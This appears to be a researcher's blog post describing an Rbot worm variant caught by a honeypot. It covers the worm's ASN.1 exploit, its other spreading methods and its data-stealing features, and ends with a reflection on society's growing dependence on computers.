The time of the flash internet worms which were able to spread to millions of machines in less than an hour has passed. Nowadays, we are living in the days of the trojans, phishing, password stealing and backdoors. However, combinations between fast spreading worms and very cunning trojans aren’t rare at all.
Thursday, 2nd of June around 17:12 GTM, we’ve received an interesting exploit from one of the machines which are part of the grand ‘Smallpot’ honeypot network. Slowly, more packets started to arrive and it became obvious that whatever was sending them was picking up momentum. Since the simplest explanation is usually the right one, the first guess was an Internet worm attack.
Investigation of the packets revealed a Microsoft ASN.1 exploit, which tries to download and run an executable from the attacking machine via TFTP. We’ve secured a binary and took a look under the cover. The responsible worm was a Rbot variant, 121504 bytes long and is generically detected by KAV as ‘Backdoor.Win32.Rbot.gen’. It is packed with the MEW runtime executable packer and it has an MD5 of ‘7fe7a8320bbd029a87e0228ff5d23053’.
Besides the ASN.1 exploit – and this is the first worm to use it successfully on the Internet – the Rbot variant uses a multitude of other exploits, DCOM, RPC, Veritas Backup Exec, LSASS, MSSQL, password guessing and so on. It also steals registration keys from a good list of popular games, PayPal accounts logins, has an embedded backdoor and of course, DDoS capabilities. Basically, it’s a worm which tries very hard to spread while at the same time, it tries to steal as many valuable data from the victim machine as it is available. It is a highly infectious worm, written for profit. And yes, most of the other worms we’re seeing nowadays are no different.
Three years ago, the worst thing that could happen to your computer was a corrupted flash ROM or a wiped HDD. In most cases, you could even recover the data from the HDD. Nowadays, a virus infection is much worse. Your computer may easily become the pawn of an organization of cybercriminals which is blackmailing companies over the Internet. Or your e-banking accounts are suddenly missing a few hundred euros. Or your valuable items from a virtual game on the Internet are suddenly somebody else’s. There are cases when people killed each other over such things.
With that in mind, I come up with a question: aren’t we becoming too addicted to our beloved computers? Is it really worth dying for a thing which only exists as polarized atoms on a plate, between other billions, 10000Km away? Are we becoming too dependent on technology, so soon? I’m afraid the answer has more implications than we are ready to accept.